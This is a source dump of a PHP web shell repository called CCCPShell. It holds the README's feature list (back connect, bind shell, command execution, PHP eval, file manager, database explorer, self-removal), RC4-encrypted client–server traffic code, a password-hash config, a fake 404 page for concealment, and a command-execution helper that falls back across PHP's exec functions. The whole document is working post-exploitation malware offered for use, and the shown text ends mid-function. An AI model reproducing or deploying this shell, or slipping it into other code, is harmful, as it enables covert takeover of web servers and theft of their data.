├── CCCP-Shell.php ├── README.md ├── builder ├── base │ ├── base.css │ ├── base.js │ ├── config.php │ ├── fakeindex.php │ ├── helpers.php │ ├── loader.js │ ├── loader.php │ ├── theme.php │ └── zip.php ├── builder.php ├── includes │ ├── jsPacker.php │ └── tools.php └── sections │ ├── connect.php │ ├── execute.php │ ├── filemanager.css │ ├── filemanager.php │ ├── info.php │ ├── process.php │ ├── selfremove.php │ ├── sql.js │ └── sql.php ├── examples ├── mysql_exploit_example.php ├── serv-u_exploit_example.php └── windows_registry.php └── misc ├── 687474703a2f2f6935392e74696e797069632e636f6d2f32696b776d6d612e6a7067.jpg ├── 687474703a2f2f6935392e74696e797069632e636f6d2f6663327a32762e6a7067.jpg ├── 687474703a2f2f6936302e74696e797069632e636f6d2f726c7a316f6c2e6a7067.jpg ├── 687474703a2f2f6936322e74696e797069632e636f6d2f327a35353363382e6a7067.jpg ├── diagram.png └── diagram.psd /README.md: -------------------------------------------------------------------------------- 1 | CCCP Shell 2 | ==== 3 | 4 | CCCPShell is a PHP Shell written from scratch in my spare time. 5 | 6 | ![alt text](https://raw.githubusercontent.com/xchwarze/CCCPShell/master/misc/diagram.png "CCCPShell - Diagram") 7 | 8 | You will find in this shell 9 | ----------- 10 | * Pure javascript (sessionStorage, serialize, ajax, append, remove, empty, change sort table order and dialogs modals) 11 | * PHP zip with php code 12 | * Full DB explorer (mysql, mssql, pgsql, oracle, sqlite, sqlite3, odbc and pdo) 13 | * 21 icons for use in 94 file types 14 | * CSS3 15 | * Easy to translate to another language via tText function *WIP* 16 | * All the standard shell stuff 17 | * Encrypted comunication (first phpshell in the world???) 18 | * Support PHP > 4.3 (lastest versions not tested in php 4) 19 | 20 | All tools 21 | ----------- 22 | - Filemanager 23 | - Copy/paste (recursive) 24 | - In memory compress and download (recursive) 25 | - Uncompress files 26 | - Upload files to server 27 | - Delete (recursive) 28 | - Create file/folder 29 | - Fast view folder size/count objets 30 | - Fast file rename 31 | - Fast chmod 32 | - Fast change filedate 33 | - Create file/folder 34 | - View file information 35 | - Full Path 36 | - Size 37 | - MD5 38 | - Chmod/Chown 39 | - Create time 40 | - Access time 41 | - Modify time 42 | - Hexdump preview/full 43 | - Highlight code 44 | - File Content 45 | - Edit 46 | - Change filetime 47 | - File Name 48 | - Change content 49 | - Procs 50 | - Process viewer/info 51 | - Process killer 52 | - SQL 53 | - Database explorer 54 | - Execute SQL code 55 | - Info 56 | - Server info 57 | - PHP Info 58 | - Custom functions check 59 | - External Connect 60 | - Back Connect 61 | - Bind Shell 62 | - Execute 63 | - Eval PHP code 64 | - Execute (exec, shell_exec, system, passthru, popen and proc_open) 65 | - Self remove 66 | 67 | WARNING 68 | ----------- 69 | This shell use atob an btob javascript functions. Read if your browser support it https://developer.mozilla.org/en-US/docs/Web/API/WindowBase64.atob 70 | 71 | Images 72 | ----------- 73 | 74 | ![alt text](https://raw.githubusercontent.com/xchwarze/CCCPShell/master/misc/687474703a2f2f6935392e74696e797069632e636f6d2f6663327a32762e6a7067.jpg "CCCPShell - File manager") 75 | 76 | ![alt text](https://raw.githubusercontent.com/xchwarze/CCCPShell/master/misc/687474703a2f2f6936322e74696e797069632e636f6d2f327a35353363382e6a7067.jpg "CCCPShell - Mass copy") 77 | 78 | ![alt text](https://raw.githubusercontent.com/xchwarze/CCCPShell/master/misc/687474703a2f2f6936302e74696e797069632e636f6d2f726c7a316f6c2e6a7067.jpg "CCCPShell - Folder size") 79 | -------------------------------------------------------------------------------- /builder/base/base.css: -------------------------------------------------------------------------------- 1 | *{ 2 | box-sizing: border-box; 3 | color: #fff; 4 | font-family: verdana; 5 | text-decoration: none; 6 | } 7 | body{ 8 | background-color: #000; 9 | } 10 | body, td, th{ 11 | color: #d9d9d9; 12 | font-size: 11px; 13 | } 14 | td{ 15 | font-size: 8pt; 16 | color: #ebebeb; 17 | } 18 | td.header{ 19 | font-weight: normal; 20 | font-size: 10pt; 21 | background: #7d7474; 22 | } 23 | a{ 24 | font-weight: normal; 25 | color: #dadada; 26 | } 27 | a.links{ 28 | text-decoration: none; 29 | } 30 | a:hover{ 31 | text-decoration: underline; 32 | } 33 | input, textarea, button, select, option{ 34 | background-color: #800; 35 | border: 0; 36 | font-size: 8pt; 37 | font-family: Tahoma; 38 | margin: 5px; 39 | padding: 6px; 40 | } 41 | select, option{ 42 | padding: 3px; 43 | } 44 | p{ 45 | margin-top: 0px; 46 | margin-bottom: 0px; 47 | size-height: 150% 48 | } 49 | table.sortable tbody tr:hover td{ 50 | background-color: #8080FF; 51 | } 52 | table.sortable tbody tr:nth-child(2n), .alt1{ 53 | background-color: #7d7474; 54 | } 55 | table.sortable tbody tr:nth-child(2n+1), .alt2{ 56 | background-color: #7d7f74; 57 | } 58 | pre{ 59 | font: 9pt Courier, Monospace; 60 | } 61 | .bigarea{ 62 | height: 220px; 63 | width: 100%; 64 | } 65 | .ml1{ 66 | border:1px solid #444; 67 | padding:5px; 68 | margin:0; 69 | overflow: auto; 70 | } 71 | .notif{ 72 | border-radius: 6px 6px 6px 6px; 73 | font-weight: 700; 74 | margin: 3px 0; 75 | padding: 4px 8px 4px; 76 | } 77 | .uiinfo{ 78 | display: none; 79 | border: 1px solid #800000; 80 | border-radius: 6px 6px 6px 6px; 81 | margin: 4px 0; 82 | width: 100%; 83 | } 84 | .explore{ 85 | width:100%; 86 | border-collapse:collapse; 87 | border-spacing:0; 88 | } 89 | .explore a{ 90 | text-decoration:none; 91 | } 92 | .explore td{ 93 | padding:5px 10px 5px 5px; 94 | } 95 | .explore th{ 96 | font-weight:700; 97 | background-color:#222; 98 | } 99 | .explore tbody tr:hover, .mark{ 100 | background-color:#8080FF; 101 | } 102 | .box{ 103 | min-width:50%; 104 | border:1px solid #fff; 105 | padding:8px 8px 0 8px; 106 | position:fixed; 107 | background:#000; 108 | box-shadow:1px 1px 25px #150f0f; 109 | opacity:0.96; 110 | } 111 | .boxtitle{ 112 | background:#7d7474; 113 | font-weight:bold; 114 | text-align:center; 115 | cursor: move; 116 | padding: 3px; 117 | } 118 | .boxtitle a, .boxtitle a:hover{ 119 | color:#aaa; 120 | } 121 | .boxcontent{ 122 | padding:2px 0 2px 0; 123 | } 124 | .boxresult{ 125 | padding:4px 10px 6px 10px; 126 | border-top:1px solid #222; 127 | margin-top:4px; 128 | text-align:center; 129 | } 130 | .boxtbl{ 131 | border:1px solid #222; 132 | border-radius:8px; 133 | padding-bottom:8px; 134 | } 135 | .boxtbl td{ 136 | vertical-align:middle; 137 | padding:8px 15px; 138 | border-bottom:1px dashed #222; 139 | } 140 | .boxtbl input, .boxtbl select, .boxtbl textarea, .boxtbl, .button{ 141 | width:100%; 142 | } 143 | .boxlabel{ 144 | text-align: center; 145 | border-bottom:1px solid #222; 146 | padding-bottom:8px; 147 | } 148 | .boxclose{ 149 | background:#222; 150 | padding:2px; 151 | margin-right:2px; 152 | padding:0 4px; 153 | cursor:pointer; 154 | } 155 | .button{ 156 | min-width:120px; 157 | color:#fff; 158 | background:#800; 159 | border:none; 160 | display:block; 161 | text-align:center; 162 | /*float:left;*/ 163 | padding: 6px; 164 | cursor:pointer; 165 | } 166 | .button:hover, #ulDragNDrop:hover{ 167 | background:#820; 168 | } 169 | .floatLeft{ 170 | text-align:left; 171 | float:left; 172 | } 173 | .floatRight{ 174 | float:right; 175 | } 176 | .floatCenter{ 177 | text-align:center; 178 | margin-left:auto; 179 | margin-right:auto; 180 | } 181 | .colFit{ 182 | width:1px; 183 | white-space:nowrap; 184 | } 185 | .colSpan{ 186 | width:100%; 187 | } 188 | .loading { 189 | margin-left: auto; 190 | margin-right: auto; 191 | background-color: rgba(0,0,0,0); 192 | border: 5px solid #800; 193 | opacity: .9; 194 | border-top: 5px solid rgba(0,0,0,0); 195 | border-left: 5px solid rgba(0,0,0,0); 196 | border-radius: 50px; 197 | box-shadow: 0 0 35px #800; 198 | width: 50px; 199 | height: 50px; 200 | margin: 0 auto; 201 | -moz-animation: spin .5s infinite linear; 202 | -webkit-animation: spin .5s infinite linear; 203 | } 204 | .mini { 205 | border: 2px solid #800; 206 | border-top: 2px solid rgba(0,0,0,0); 207 | border-left: 2px solid rgba(0,0,0,0); 208 | border-radius: 10px; 209 | box-shadow: 0; 210 | width: 15px; 211 | height: 15px; 212 | } 213 | @-moz-keyframes spin { 214 | 0% {-moz-transform: rotate(0deg);} 215 | 100% {-moz-transform: rotate(360deg);}; 216 | } 217 | @-moz-keyframes spinoff { 218 | 0% {-moz-transform: rotate(0deg);} 219 | 100% {-moz-transform: rotate(-360deg);}; 220 | } 221 | @-webkit-keyframes spin { 222 | 0% {-webkit-transform: rotate(0deg);} 223 | 100% {-webkit-transform: rotate(360deg);}; 224 | } 225 | @-webkit-keyframes spinoff { 226 | 0% {-webkit-transform: rotate(0deg);} 227 | 100% {-webkit-transform: rotate(-360deg);}; 228 | } 229 | 230 | .hide{ 231 | display:none; 232 | margin:0; 233 | padding:0; 234 | } 235 | 236 | .touch{cursor:pointer;} 237 | .my{color:yellow;} 238 | .mg{color:green;} 239 | .mr{color:red;} 240 | .mw{color:white;} 241 | .table{display:table;} 242 | .table-caption{display:table-caption;} 243 | .table-row{display:table-row;} 244 | .table-col{display:table-cell; padding: 5px;} 245 | 246 | .stdui{ 247 | padding:6px; 248 | } 249 | 250 | .uires{ 251 | border: 1px solid #ddd; 252 | padding: 15px; 253 | margin: 10px; 254 | text-align: center; 255 | font-weight: bold; 256 | } 257 | 258 | .image{ 259 | width:16px; 260 | height:16px; 261 | cursor:pointer; 262 | display:block; 263 | float:left; 264 | margin-right:3px; 265 | } 266 | 267 | div.paginator { 268 | text-align:center; 269 | padding: 7px; 270 | margin: 3px; 271 | } 272 | 273 | div.paginator a { 274 | padding: 2px 5px 2px 5px; 275 | margin: 2px; 276 | border: 1px solid #000; 277 | text-decoration: none; 278 | } 279 | 280 | div.paginator a:hover, div.paginator a:active { 281 | border: 1px solid #000; 282 | background-color:#000; 283 | color: #fff; 284 | } 285 | 286 | div.paginator span.current { 287 | padding: 2px 5px 2px 5px; 288 | margin: 2px; 289 | border: 1px solid #000; 290 | font-weight: bold; 291 | background-color: #000; 292 | color: #fff; 293 | } 294 | 295 | div.paginator span.disabled { 296 | padding: 2px 5px 2px 5px; 297 | margin: 2px; 298 | border: 1px solid #eee; 299 | color: #ddd; 300 | } -------------------------------------------------------------------------------- /builder/base/base.js: -------------------------------------------------------------------------------- 1 | var h = 0; 2 | var j = 1; 3 | var d = document; 4 | var euc = encodeURIComponent; 5 | var onDrag = false; 6 | var dragX, dragY, dragDeltaX, dragDeltaY, lastAjax , lastLoad = ""; 7 | var copyBuffer = []; 8 | 9 | // sorttable js 10 | sorttable={k:function(a){sorttable.a=/^(\d\d?)[\/\.-](\d\d?)[\/\.-]((\d\d)?\d\d)$/,0==a.getElementsByTagName("thead").length&&(the=d.createElement("thead"),the.appendChild(a.rows[0]),a.insertBefore(the,a.firstChild));null==a.tHead&&(a.tHead=a.getElementsByTagName("thead")[0]); 11 | if(1==a.tHead.rows.length){sortbottomrows=[];for(b=0;bc;--f)0>b(a[f],a[f-1])&&(g=a[f],a[f]=a[f-1],a[f-1]=g,g=h);c++}}}; 21 | n=1;function p(a){b=h;a||(a=((this.ownerDocument||this.document||this).parentWindow||window).event,a.preventDefault=q,a.stopPropagation=r);c=this.b[a.type],e;for(e in c)this.h=c[e],this.h(a)===j&&(b=j);return b}function q(){this.returnValue=j}function r(){this.cancelBubble=h}Array.forEach||(Array.forEach=function(a,b,c){for(e=0;e= 0; i = i - 1){ 50 | if (form.elements[i].name === "") continue; 51 | switch (form.elements[i].nodeName){ 52 | case "INPUT": 53 | switch (form.elements[i].type){ 54 | case "text": 55 | case "hidden": 56 | case "password": 57 | case "button": 58 | case "reset": 59 | case "submit": 60 | q.push(form.elements[i].name + "=" + euc(form.elements[i].value)); 61 | break; 62 | case "checkbox": 63 | case "radio": 64 | if (form.elements[i].checked) q.push(form.elements[i].name + "=" + euc(form.elements[i].value)); 65 | break; 66 | case "file": 67 | break; 68 | } 69 | break; 70 | case "TEXTAREA": 71 | q.push(form.elements[i].name + "=" + euc(form.elements[i].value)); 72 | break; 73 | case "SELECT": 74 | switch (form.elements[i].type){ 75 | case "select-one": 76 | q.push(form.elements[i].name + "=" + euc(form.elements[i].value)); 77 | break; 78 | case "select-multiple": 79 | for (j = form.elements[i].options.length - 1; j >= 0; j = j - 1){ 80 | if (form.elements[i].options[j].selected) q.push(form.elements[i].name + "=" + euc(form.elements[i].options[j].value)); 81 | } 82 | break; 83 | } 84 | break; 85 | case "BUTTON": 86 | switch (form.elements[i].type){ 87 | case "reset": 88 | case "submit": 89 | case "button": 90 | q.push(form.elements[i].name + "=" + euc(form.elements[i].value)); 91 | break; 92 | } 93 | break; 94 | } 95 | } 96 | return q.join("&"); 97 | } 98 | 99 | function getData(s, m){ 100 | k = rc4Init(hash); 101 | try { 102 | if (m === "e") { 103 | //console.log(s); 104 | r = euc(btoa(rc4(randStr(config.rc4drop) + s, k))); 105 | } else 106 | r = rc4(atob(s), k).substr(config.rc4drop); 107 | } catch(err) { 108 | r = d; 109 | } 110 | 111 | return r; 112 | } 113 | 114 | function ajax(p, cf){ 115 | console.log(p); 116 | var ao = {}; 117 | lastAjax = p; 118 | ao.cf = cf; 119 | ao.request = new XMLHttpRequest(); 120 | ao.bindFunction = function (caller, object){ 121 | return function (){ 122 | return caller.apply(object, [object]); 123 | }; 124 | }; 125 | ao.stateChange = function (object){ 126 | if (ao.request.readyState == 4) ao.cf(getData(ao.request.responseText, "d")); 127 | }; 128 | if (window.XMLHttpRequest){ 129 | req = ao.request; 130 | req.onreadystatechange = ao.bindFunction(ao.stateChange, ao); 131 | req.open("POST", targeturl, true); 132 | req.setRequestHeader("X-Requested-With", "XMLHttpRequest"); 133 | req.setRequestHeader("Content-Type", "application/x-www-form-urlencoded"); 134 | req.setRequestHeader("Connection", "close"); 135 | req.send(config.consNames.post + "=" + getData(p, "e")); 136 | } 137 | return ao; 138 | } 139 | 140 | function dpath(e, t){ 141 | if (t) 142 | return d.getElementById("base").value + e.parentNode.parentNode.getAttribute("data-path"); 143 | else 144 | return e.parentNode.parentNode.getAttribute("data-path"); 145 | } 146 | 147 | //TODO removeEventListener 148 | function drag_start(){ 149 | if(!onDrag){ 150 | onDrag = true; 151 | //d.removeEventListener("mousemove", function(e){}, false); 152 | d.addEventListener("mousemove", function(e){ 153 | dragX = e.pageX; 154 | dragY = e.pageY; 155 | }, false); 156 | setTimeout("drag_loop()", 50); 157 | } 158 | } 159 | 160 | function drag_loop(){ 161 | if (onDrag){ 162 | x = dragX - dragDeltaX; 163 | y = dragY - dragDeltaY; 164 | if (x < 0) x = 0; 165 | if (y < 0) y = 0; 166 | o = d.getElementById("box").style; 167 | o.left = x + "px"; 168 | o.top = y + "px"; 169 | setTimeout("drag_loop()", 50); 170 | } 171 | } 172 | 173 | function drag_stop(){ 174 | onDrag = false; 175 | //d.removeEventListener("mousemove", function(e){}, false); 176 | } 177 | 178 | function show_box(t, ct){ 179 | hide_box(); 180 | box = "

" + 181 | t + "x

" + 182 | ct + "
"; 183 | append("content", box); 184 | 185 | x = (d.body.clientWidth - d.getElementById("box").clientWidth)/2; 186 | y = (d.body.clientHeight - d.getElementById("box").clientHeight)/2; 187 | if (x < 0) x = 0; 188 | if (y < 0) y = 0; 189 | dragX = x; 190 | dragY = y; 191 | o = d.getElementById("box").style; 192 | o.left = x + "px"; 193 | o.top = y + "px"; 194 | 195 | d.addEventListener("keyup", function (e){ 196 | if (e.keyCode === 27) hide_box(); 197 | }); 198 | 199 | d.getElementById("boxtitle").addEventListener("click", function(e){ 200 | e.preventDefault(); 201 | if (!onDrag){ 202 | dragDeltaX = e.pageX - parseInt(o.left); 203 | dragDeltaY = e.pageY - parseInt(o.top); 204 | drag_start(); 205 | } else 206 | drag_stop(); 207 | }, false); 208 | 209 | if (d.getElementById("uival")) d.getElementById("uival").focus(); 210 | } 211 | 212 | function hide_box(){ 213 | onDrag = false; 214 | //d.removeEventListener("keyup", function(e){}, false); 215 | remove("box"); 216 | remove("dlf"); 217 | } 218 | 219 | function ajaxLoad(p){ 220 | empty("content"); 221 | append("content", "
"); 222 | ajax(p, function(r){ 223 | empty("content"); 224 | append("content", r); 225 | uiUpdateControls(); 226 | lastLoad = p; 227 | }); 228 | } 229 | 230 | function uiUpdateControls(){ 231 | o = d.getElementById("jseval"); 232 | if (o) eval(o.value); 233 | o = d.getElementById("sort"); 234 | if (o) sorttable.k(o); 235 | o = d.getElementById("etime"); 236 | if (o) d.getElementById("uetime").innerHTML = o.value; 237 | } 238 | 239 | function viewSize(f){ 240 | f.innerHTML = "
"; 241 | ajax("me=filemanager&md=vs&f=" + euc(dpath(f, true)), function(r){ 242 | f.innerHTML = r; 243 | }); 244 | } 245 | 246 | function godir(f, t){ 247 | ajaxLoad("me=filemanager&dir=" + euc(dpath(f, t))); 248 | } 249 | 250 | function godisk(f){ 251 | ajaxLoad("me=filemanager&dir=" + euc(f.getAttribute("data-path"))); 252 | } 253 | 254 | function godirui(){ 255 | ajaxLoad("me=filemanager&dir=" + euc(d.getElementById("goui").value)); 256 | } 257 | 258 | function showUI(a, o){ 259 | path = dpath(o, false); 260 | datapath = dpath(o, true); 261 | disabled = ""; 262 | text = "Name"; 263 | btitle = "Go!"; 264 | 265 | if (a === "del"){ 266 | disabled = "disabled"; 267 | title = "Del"; 268 | } else if (a === "ren"){ 269 | title = "Rename"; 270 | } else if (a === "mpers"){ 271 | path = o.innerHTML.substring(17, 21); 272 | title = "Chmod/Chown"; 273 | text = title.substring(0, 5); 274 | } else if (a === "mdate"){ 275 | path = o.getAttribute("data-ft"); 276 | title = "Date"; 277 | text = title; 278 | } else if ((a === "cdir") || (a === "cfile")){ 279 | path = ""; 280 | datapath = d.getElementById("base").value; 281 | title = "Create directory"; 282 | if (a === "cfile") title = "Create file"; 283 | } 284 | 285 | ct = "" + 286 | "" + 287 | "" + 288 | "
" + text + "
" + btitle + "
"; 289 | show_box(title, ct); 290 | } 291 | 292 | function showUISec(a){ 293 | btitle = "Go!"; 294 | uival = ""; 295 | n = """"; 296 | s = serialize(d.forms[0]).replace(/chkall=&/g, ""); 297 | s = s.substring(0, s.indexOf("&goui=")); 298 | 299 | if (a === "comp"){ 300 | title = "Download"; 301 | } else if (a === "uncomp"){ 302 | title = "Uncompress"; 303 | } else if (a === "copy"){ 304 | title = "Copy"; 305 | uival = "To"; 306 | n = "d.getElementById("uival").value"; 307 | } else if (a === "rdel"){ 308 | title = "Del"; 309 | } 310 | 311 | ct = "" + 312 | uival + 313 | "" + 314 | "" + 315 | "
" + btitle + "
"; 316 | show_box(title, ct); 317 | } 318 | 319 | function showFMExtras(){ 320 | ct = "
" + 321 | "" + 322 | "" + 326 | "" + 328 | "" + 329 | "
Show only" + 323 | "" + 324 | "
Only writable" + 325 | " 
Recursive listing" + 327 | " 
Show
" + 330 | "" + 331 | "
"; 332 | 333 | show_box("Show extra tools", ct); 334 | } 335 | 336 | function processUI(a, o, n){ 337 | if ((a === "del" || a === "rdel") && config.checkBDel) { 338 | if (!confirm('Are you sure?')) { 339 | hide_box(); 340 | return; 341 | } 342 | } 343 | 344 | if (a === "comp"){ 345 | hide_box(); 346 | append("content", ""); 347 | } else { 348 | if (a === "uncomp") o = "dummy" + o; 349 | else if (a !== "rdel" && n === "") return; 350 | else if (a !== "copy" && a !== "rdel") o = euc(o); 351 | else if (a === "ren") n = d.getElementById("base").value + n; 352 | 353 | append("box", "
"); 354 | ajax("me=filemanager&md=tools&ac=" + a + "&a=" + o + "&b=" + euc(n), function(r){ 355 | remove("mloading"); 356 | if (r === "OK"){ 357 | hide_box(); 358 | ajaxLoad(lastLoad); 359 | } else 360 | append("box", "
" + r + "
"); 361 | }); 362 | } 363 | } 364 | 365 | function dl(o){ 366 | remove("dlf"); 367 | append("content", ""); 368 | } 369 | 370 | function up(){ 371 | ct = "
" + 372 | "" + 373 | "" + 374 | "" + 375 | "" + 376 | "" + 377 | "
URL
File
Go!
" + 378 | "
"; 379 | show_box("Upload", ct); 380 | } 381 | 382 | function upaction(){ 383 | uri = d.getElementById("uri").value; 384 | if (uri !== "") 385 | processUI("reup", d.getElementById("base").value, uri); 386 | else if (d.getElementById("upf").value !== "") 387 | document.up.submit(); 388 | } 389 | 390 | function uiupdate(t){ 391 | ajax(serialize(d.forms[t]), function(r){ 392 | if (!d.getElementById("uires")) 393 | prepend("content", "
"); 394 | 395 | append("uires", "Shell response: " + r + "
\n"); 396 | d.getElementById("uires").scrollIntoView(); 397 | }); 398 | } 399 | 400 | 401 | function CheckAll(form){ 402 | for(i = 0; i < form.elements.length; i++){ 403 | e = form.elements[i]; 404 | if (e.name != "chkall") e.checked = form.chkall.checked; 405 | } 406 | } 407 | 408 | function toggle(b){ 409 | if (d.getElementById(b)){ 410 | if (d.getElementById(b).style.display == "block") d.getElementById(b).style.display = "none"; 411 | else d.getElementById(b).style.display = "block" 412 | } 413 | } 414 | 415 | function change(l, b){ 416 | d.getElementById(l).style.display = "none"; 417 | d.getElementById(b).style.display = "block"; 418 | if (d.getElementById("goui")) d.getElementById("goui").focus(); 419 | } 420 | 421 | function hilite(e){ 422 | c = e.parentElement.parentElement; 423 | if (e.checked) 424 | c.className = "mark"; 425 | else 426 | c.className = ""; 427 | 428 | a = d.getElementsByName("cbox"); 429 | b = d.getElementById("total_selected"); 430 | c = 0; 431 | 432 | for (i = 0;i'dsr', 'slogin'=>'cccpshell', 'sqlclog'=>'conlog'); //Constants names 12 | $config['sPass'] = '775a373fb43d8101818d45c28036df87'; // md5(pass) 13 | $config['rc4drop'] = 123; //drop size 14 | -------------------------------------------------------------------------------- /builder/base/fakeindex.php: -------------------------------------------------------------------------------- 1 | 2 | 3 | 404 Not Found 4 | 49 | 50 |

Not Found

51 |

The requested URL was not found on this server.

52 | 53 | 54 |
55 | -------------------------------------------------------------------------------- /builder/base/helpers.php: -------------------------------------------------------------------------------- 1 | "; 34 | } 35 | 36 | function mLink($t, $o, $e = '', $m = true){ 37 | if ($m) $o .= ';return false;'; 38 | return "$t"; 39 | } 40 | 41 | function mInput($n, $v, $tt = '', $nl = '', $c = '', $e = ''){ 42 | if ($tt !== '') $tt = "$tt
"; 43 | 44 | $input = "$tt"; 45 | if ($nl !== '') $input = "

$input

"; 46 | 47 | return $input; 48 | } 49 | 50 | function mSubmit($v, $o, $nl = '', $e = ''){ 51 | $input = ""; 52 | if ($nl !== '') $input = "

$input

"; 53 | 54 | return $input; 55 | } 56 | 57 | function mSelect($n, $v, $nk = false, $s = false, $o = false, $t = false, $nl = false, $e = false){ 58 | $tmp = ''; 59 | if ($o) $o = "onchange='$o'"; 60 | if ($t) $t = "$t
"; 61 | foreach ($v as $key => $value){ 62 | if ($nk) $key = $value; 63 | $tmp .= ""; 64 | } 65 | 66 | $tmp = "$t"; 67 | if ($nl) 68 | $tmp = "

$tmp

"; 69 | 70 | return $tmp; 71 | } 72 | 73 | function mCheck($n, $v, $o = '', $c = false){ 74 | return ""; 75 | } 76 | 77 | function genPaginator($c, $t = -1, $fm = true) { 78 | global $p; 79 | 80 | $l = 'dbexec(euc("' . (isset($p['code']) ? $p['code'] : '') . '") + "&pg='; 81 | if ($fm) 82 | $l = 'ajaxLoad("me=file&dir=" + euc(d.getElementById("base").value) + "&pg='; 83 | 84 | if ($t < 0) 85 | $t = $c + 1; 86 | 87 | $tmp = '
'; 88 | $i = 0; 89 | while($i < $t) { 90 | $i++; 91 | if ($i < $c) 92 | $tmp .= mLink($i, $l . $i . '")', 'class="prev"'); 93 | else if ($i == $c) 94 | $tmp .= '' . $i . ''; 95 | else 96 | $tmp .= mLink($i . ($fm ? ' ...?' : ''), $l . $i . '")', 'class="next"'); 97 | } 98 | 99 | return $tmp . '
'; 100 | } 101 | 102 | 103 | function fix_magic_quote($arr){ 104 | $quotes_sybase = strtolower(ini_get('magic_quotes_sybase')); 105 | $quotes_sybase = (empty($quotes_sybase) || $quotes_sybase === 'off') ? false : true; 106 | if(function_exists('get_magic_quotes_gpc') && get_magic_quotes_gpc()){ 107 | if(is_array($arr)){ 108 | foreach($arr as $k => $v){ 109 | if(is_array($v)) $arr[$k] = fix_magic_quote($v); 110 | else $arr[$k] = ($quotes_sybase ? stripslashes($v) : stripslashes(str_replace("\'\'", "\'", $v))); 111 | } 112 | } else { 113 | $arr = stripslashes($arr); 114 | } 115 | } 116 | return $arr; 117 | } 118 | 119 | function rc4Init($pwd) { 120 | $key = array(); 121 | $box = array(); 122 | $pwd_length = strlen($pwd); 123 | 124 | for ($i = 0; $i < 256; $i++) { 125 | $key[$i] = ord($pwd[$i % $pwd_length]); 126 | $box[$i] = $i; 127 | } 128 | 129 | for ($j = $i = 0; $i < 256; $i++) { 130 | $j = ($j + $box[$i] + $key[$i]) % 256; 131 | $tmp = $box[$i]; 132 | $box[$i] = $box[$j]; 133 | $box[$j] = $tmp; 134 | } 135 | 136 | return $box; 137 | } 138 | 139 | function rc4($data, $box) { 140 | $cipher = ''; 141 | $data_length = strlen($data); 142 | 143 | for ($a = $j = $i = 0; $i < $data_length; $i++) { 144 | $a = ($a + 1) % 256; 145 | $j = ($j + $box[$a]) % 256; 146 | 147 | $tmp = $box[$a]; 148 | $box[$a] = $box[$j]; 149 | $box[$j] = $tmp; 150 | $cipher .= chr(ord($data[$i]) ^ $box[(($box[$a] + $box[$j]) % 256)]); 151 | } 152 | 153 | return $cipher; 154 | } 155 | 156 | function rc4encrypt($data, $box) { 157 | global $config; 158 | for ($i = 1; $i <= $config['rc4drop']; $i++) 159 | $data = chr(mt_rand(33, 122)) . $data; 160 | return rc4($data, rc4Init($box)); 161 | } 162 | 163 | function rc4decrypt($data, $box) { 164 | global $config; 165 | return substr(rc4($data, rc4Init($box)), $config['rc4drop']); 166 | } 167 | 168 | function getData(){ 169 | global $config; 170 | $p = ''; 171 | if (isset($_POST[$config['consNames']['post']])) $p = fix_magic_quote($_POST[$config['consNames']['post']]); 172 | else if (isset($_GET[$config['consNames']['post']])) $p = fix_magic_quote($_GET[$config['consNames']['post']]); 173 | if (!empty($p)){ 174 | $data = array(); 175 | $p = rc4decrypt(base64_decode($p), $config['sPass']); 176 | foreach(explode('&', $p) as $tmp) { 177 | $tmp = explode('=', $tmp); 178 | if (!empty($tmp[0])){ 179 | if (strpos($tmp[0], '[]') !== false) $data[str_replace('[]', '', $tmp[0])][] = rawurldecode($tmp[1]); 180 | else $data[$tmp[0]] = rawurldecode($tmp[1]); 181 | } 182 | } 183 | $p = $data; 184 | } 185 | return $p; 186 | } 187 | 188 | function getSelf(){ 189 | return $_SERVER['PHP_SELF'] ? $_SERVER['PHP_SELF'] : $_SERVER['SCRIPT_NAME']; 190 | } 191 | 192 | function tText($id, $def = false){ 193 | // TODO ver que hacer con esta func 194 | 195 | if ($def === false) { 196 | return $id; 197 | } 198 | 199 | if (isset($lang[$id])) return $lang[$id]; 200 | else return $def; 201 | } 202 | 203 | function showIcon($f){ 204 | $image = 'unk'; 205 | $f = strtolower(substr(strrchr($f, '.'), 1)); 206 | $img = array('htaccess', 'asp', 'cgi', 'php', 'html', 'jpg', 'js', 'swf', 'txt', 207 | 'tar', 'mp3', 'avi', 'cmd', 'cpp', 'ini', 'doc', 'exe', 'log', 'pl', 'py', 'xml'); 208 | 209 | $imgEquals = array( 210 | 'tar' => array('tar', 'r00', 'ace', 'arj', 'bz', 'bz2', 'tbz', 'tbz2', 'tgz', 'uu', 'xxe', 'zip', 'cab', 'gz', 'iso', 'lha', 'lzh', 'pbk', 'rar', 'uuf', '7z'), 211 | 'php' => array('php', 'php3', 'php4', 'php5', 'phtml', 'shtml'), 212 | 'jpg' => array('jpg', 'gif', 'png', 'jpeg', 'jfif', 'jpe', 'bmp', 'ico', 'tif', 'tiff'), 213 | 'html'=> array('html', 'htm'), 214 | 'avi' => array('avi', 'mov', 'mvi', 'mpg', 'mpeg', 'wmv', 'rm', 'mp4'), 215 | 'lnk' => array('lnk', 'url'), 216 | 'ini' => array('ini', 'css', 'inf'), 217 | 'doc' => array('doc', 'dot', 'wri', 'rtf', 'pdf'), 218 | 'js' => array('js', 'vbs'), 219 | 'cmd' => array('cmd', 'bat', 'pif'), 220 | 'swf' => array('swf', 'fla'), 221 | 'mp3' => array('mp3', 'au', 'midi', 'mid'), 222 | 'htaccess' => array('htaccess', 'htpasswd', 'ht', 'hta', 'so') 223 | ); 224 | 225 | if (in_array($f, $img)) $image = $f; 226 | if ($image === 'unk'){ 227 | foreach ($imgEquals as $k => $v){ 228 | if (in_array($f, $v)){ 229 | $image = $k; 230 | break; 231 | } 232 | } 233 | } 234 | 235 | return "
"; 236 | } 237 | 238 | # General functions 239 | function hsc($s){ 240 | //return htmlspecialchars($s, 2|1); 241 | return htmlentities($s); 242 | } 243 | 244 | function fixRoute($r){ 245 | return str_replace(array('/', '\\'), DS, $r); 246 | } 247 | 248 | function execute($e){ 249 | if (empty($e)){ 250 | return ''; 251 | } 252 | 253 | //$e = $e . ' 2>&1'; 254 | $dis_func = explode(',', get_cfg_var('disable_functions')); 255 | 256 | if (function_exists('exec') && !in_array('exec', $dis_func)){ 257 | @exec($e, $r); 258 | if ($r) { 259 | $r = implode("\n", $r); 260 | } 261 | } else if (function_exists('shell_exec') && !in_array('shell_exec', $dis_func)){ 262 | $r = @shell_exec($e); 263 | } else if (function_exists('system') && !in_array('system', $dis_func)){ 264 | @ob_start(); 265 | @system($e); 266 | $r = @ob_get_contents(); 267 | @ob_end_clean(); 268 | } else if (function_exists('passthru') && !in_array('passthru', $dis_func)){ 269 | @ob_start(); 270 | @passthru($e); 271 | $r = @ob_get_contents(); 272 